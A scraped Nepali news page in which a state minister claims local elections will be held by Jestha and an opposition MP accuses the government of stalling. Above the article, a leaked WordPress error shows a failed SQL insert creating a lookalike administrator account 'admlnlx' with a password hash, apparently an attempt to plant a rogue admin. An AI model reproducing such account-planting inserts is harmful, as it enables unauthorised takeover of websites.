WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BiAlwlJPuE45bTwlwVOLwiSwuk.0SK.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-25 01:55:58', '', 'admlnlx', 'admlnlx')
कावासोती, माघ २८–
वाणिज्य राज्यमन्त्री सुवर्ण ज्वारचनले जेष्ठभित्र जसरी भएपनि स्थानीय निकायको निर्वाचन हुने दाबी गर्नुभएको छ ।
नवलपरासीको चोरमारामा बिहीबारदेखि सुरु भएको मध्यविन्दु महोत्सवको उद्घाटन गर्दै राज्यमन्त्री ज्वारचनले जसरी भएपनि जेठ महिनाभित्र स्थानीय तहको निर्वाचन हुनेमा ढुक्क भएर बस्न आग्रह गर्नुभयो । लामो समयदेखि स्थानीय तहको निर्वाचन नभएकाले अहिले जसरी पनि वर्तमान सरकार निर्वाचन गर्नेतर्फ केन्द्रित रहेको उहाँले बताउनुभयो ।
जनता निर्वाचनको पर्खाइमा रहेको बताउँदै उहाँले गाउँगाउँमा विकासका लागि पनि जनप्रतिनिधिको आवश्यकता रहेको बताउनुभयो । जनप्रतिनिधिविहीनतालाई लामो समय राखिरहँदा थप समस्या आउने हुँदा सबै मिली निर्वाचनतर्फ देशलाइ लैजानुको विकल्प नरहेको उहाँले बताउनुभएको थियो ।
महोत्सव उद्घाटन कार्यक्रममा नवलपरासी क्षेत्र नं ३ का सांसद कृष्ण पौडेलले सरकार स्थानीय तहको निर्वाचन गर्नेतर्फ निष्क्रिय बन्दै गएको आरोप लगाउनु भएको थियो । जनता निर्वाचनको पक्षमा रहे तापनि सत्तासीन दलहरु चुनावको विपक्षमा भएकाले समस्या भएको उहाँले बताउनुभयो ।